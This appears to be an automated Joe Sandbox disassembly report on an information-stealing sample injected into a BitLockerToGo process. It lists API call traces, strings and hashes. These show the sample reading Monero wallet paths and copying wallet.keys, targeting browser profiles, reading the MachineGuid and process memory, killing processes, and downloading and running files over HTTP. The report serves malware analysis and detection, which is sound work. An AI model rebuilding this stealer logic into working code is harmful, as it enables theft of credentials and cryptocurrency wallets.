                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcat$Heap$AllocateCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID: :\$C$QuBi
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128AF: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A013A9), ref: 02A128BB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128AF: RtlAllocateHeap.NTDLL(00000000), ref: 02A128C2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128AF: GetUserNameA.ADVAPI32(00000000,02A013A9), ref: 02A128D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,02A19D6E), ref: 02A19007
                                                                                                                                                                                                                                                                                                                                                          • OpenEventA.KERNEL32(001F0003,00000000,?,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A19013
                                                                                                                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,02A19D6E), ref: 02A19024
                                                                                                                                                                                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(?,00000000,02A37803), ref: 02A19249
                                                                                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A19307
                                                                                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A1931A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A125FE: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 02A12631
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A125FE: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02A12671
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A125FE: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 02A126C6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A125FE: RtlAllocateHeap.NTDLL(00000000), ref: 02A126CD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A04A56: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A04AF5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A04A56: StrCmpCA.SHLWAPI(?), ref: 02A04B13
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A156FF: StrCmpCA.SHLWAPI(?,block,?,?,02A19377), ref: 02A15714
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A156FF: ExitProcess.KERNEL32 ref: 02A1571F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A05E61: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A05F00
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A05E61: StrCmpCA.SHLWAPI(?), ref: 02A05F1E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A14DE6: strtok_s.MSVCRT ref: 02A14E05
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A14DE6: strtok_s.MSVCRT ref: 02A14E88
                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 02A196C8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A05E61: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A060B6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A05E61: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 02A060FA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A05E61: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A0612C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A14387: SHFileOperation.SHELL32(?), ref: 02A143BD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18D90: SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?,?,?,?), ref: 02A18DB4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18D90: wsprintfA.USER32 ref: 02A18DD5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18D90: FindFirstFileA.KERNEL32(?,?), ref: 02A18DEC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18D90: _mbscmp.MSVCRT ref: 02A18E13
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18D90: _mbscmp.MSVCRT ref: 02A18E2B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18D90: _splitpath.MSVCRT ref: 02A18E66
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18D90: _ismbcupper.MSVCRT ref: 02A18EB3
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 02A197C6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A19A4C: _memset.LIBCMT ref: 02A19A71
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A19A4C: _memset.LIBCMT ref: 02A19A80
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A19A4C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 02A19A95
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A19A4C: ShellExecuteEx.SHELL32(?), ref: 02A19C35
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A19A4C: _memset.LIBCMT ref: 02A19C44
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A19A4C: _memset.LIBCMT ref: 02A19C56
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: InternetOpen$Heap_memsetlstrcpy$FileProcess$AllocateCloseCreateDirectoryEventHandleName_mbscmpstrtok_s$ConnectExecuteExitFindFirstFolderHttpInformationModuleOperationOptionPathRequestShellSleepUserVolumeWindows_ismbcupper_splitpathlstrcatlstrlenwsprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID: 27536a38d3707b6600f28b9d7177a12c$abc_
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1996436140-3117666539
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: daad1816ccfa201c9e1244dc010af0ba3ca85c56720cb2abd262ea524ff123b9
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d16a464c8efdc73f43910a4be9e416d4e64d7bddc51a4be2d162eebcb36e94ea
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: daad1816ccfa201c9e1244dc010af0ba3ca85c56720cb2abd262ea524ff123b9
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55327E729843419BD720FB65DA86B8EF7E6BFC0360F51091AE98857250DF709A09CF93
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A068F1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: StrCmpCA.SHLWAPI(?), ref: 02A0690B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A0693A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 02A06979
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A069A9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02A069B4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 02A069D8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A18669
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A18674
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,02A18680,?), ref: 02A13A93
                                                                                                                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,?), ref: 02A18689
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A18698
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02A186B1
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                                                                                                                                                                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(8D5052FC), ref: 02A0FB02
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(8D5052FC), ref: 02A0FB79
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(8D5052FC,firefox), ref: 02A0FE8D
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(8D5052FC), ref: 02A0FC6F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(8D5052FC), ref: 02A0FD20
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(8D5052FC), ref: 02A0FD97
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID: Stable\$ Stable\$firefox
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A01ACC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A01A41: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 02A01A55
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A01A41: RtlAllocateHeap.NTDLL(00000000), ref: 02A01A5C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A01A41: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,02A01AD9), ref: 02A01A79
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A01A41: RegQueryValueExA.ADVAPI32(02A01AD9,wallet_path,00000000,00000000,00000000,000000FF), ref: 02A01A94
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A01A41: RegCloseKey.ADVAPI32(02A01AD9), ref: 02A01A9D
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 02A01AE1
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A01AEE
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,.keys), ref: 02A01B09
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A138A6: GetSystemTime.KERNEL32(?,02A37807,?), ref: 02A138D5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 02A01C1A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A09163
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0F752,?,?,?), ref: 02A0917A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0F752,?,?,?), ref: 02A09191
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A091A8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CloseHandle.KERNEL32(?,?,?,?,?,02A0F752,?,?,?), ref: 02A091D0
                                                                                                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 02A01C8D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: CreateThread.KERNEL32(00000000,00000000,02A18B15,?,00000000,00000000), ref: 02A18C85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A18C8D
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Filelstrcpy$lstrcat$CloseCreateHeaplstrlen$AllocAllocateCopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                                                                                                                                                                                                                                                          • String ID: .keys$\Monero\wallet.keys
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2164590784-3586502688
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5fc06252709827f08e43cf7568e3462353cea6f1a33bed0a645187e8ab45ad6d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 49eeb95c385a93a8410dc77a297ec755253d7526145e0ee80e70a212332852f6
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fc06252709827f08e43cf7568e3462353cea6f1a33bed0a645187e8ab45ad6d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C51FA71D8022D9BCB21EB64EE85BDDB7BAAF04314F4044A1AA0873150DE71AF998F95
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A10
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A16
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A1C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04A2E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04A36
                                                                                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A06762
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 02A06782
                                                                                                                                                                                                                                                                                                                                                          • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 02A067A3
                                                                                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02A067BE
                                                                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02A067F4
                                                                                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 02A06824
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 02A0684F
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 02A06856
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A06862
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2507841554-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 02A118A0
                                                                                                                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 02A118CC
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A11911
                                                                                                                                                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,00000000,?,00000208,00000000), ref: 02A11976
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A11A02
                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 02A11A63
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1045E: _memmove.LIBCMT ref: 02A10478
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Process_memset$MemoryOpenRead_memmove
                                                                                                                                                                                                                                                                                                                                                          • String ID: N0ZWFt
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1717157771-431618156
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A13263
                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 02A13282
                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 02A132A7
                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?), ref: 02A132B3
                                                                                                                                                                                                                                                                                                                                                          • CharToOemA.USER32(?,?), ref: 02A132C7
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                                                                                                                                                                                                                                          • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2235053359-1211650757
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 02A01A55
• RtlAllocateHeap.NTDLL(00000000), ref: 02A01A5C
• RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,02A01AD9), ref: 02A01A79
• RegQueryValueExA.ADVAPI32(02A01AD9,wallet_path,00000000,00000000,00000000,000000FF), ref: 02A01A94
• RegCloseKey.ADVAPI32(02A01AD9), ref: 02A01A9D
Strings
• wallet_path, xrefs: 02A01A8C
• SOFTWARE\monero-project\monero-core, xrefs: 02A01A6F
Memory Dump Source
• Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateCloseOpenProcessQueryValue
• String ID: SOFTWARE\monero-project\monero-core$wallet_path
• API String ID: 3225020163-4244082812
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 02A1451F
• Process32First.KERNEL32(00000000,00000128), ref: 02A14533
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 02A14559
• TerminateProcess.KERNEL32(00000000,00000000), ref: 02A14568
• CloseHandle.KERNEL32(00000000), ref: 02A1456F
• Process32Next.KERNEL32(?,00000128), ref: 02A14582
• CloseHandle.KERNEL32(?), ref: 02A14592
Memory Dump Source
• Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
• String ID:
• API String ID: 2696918072-0
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,02A15BD2,Windows: ,02A378E0), ref: 02A127A0
• RtlAllocateHeap.NTDLL(00000000), ref: 02A127A7
• RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,02A378C8,?,?,?,02A15BD2,Windows: ,02A378E0), ref: 02A127D5
• RegQueryValueExA.KERNEL32(02A378C8,00000000,00000000,00000000,000000FF,?,?,?,02A15BD2,Windows: ,02A378E0), ref: 02A127F1
• RegCloseKey.ADVAPI32(02A378C8,?,?,?,02A15BD2,Windows: ,02A378E0), ref: 02A127FA
Strings
Memory Dump Source
• Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                                                                          • String ID: Windows 11
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3225020163-2517555085
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b68641aadd6222c3ff56423731c3320e0ae5aae80330a37153530e9106697351
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6b731ba4ba1e2f4bdafb69b183510a33a7f2ca7df85b5a5255aec7e3136dba44
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b68641aadd6222c3ff56423731c3320e0ae5aae80330a37153530e9106697351
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72F04F79A80304FFEB109B90DC0BFAB7AB9EB84750F140524BF01D5184DBB0D960DB51
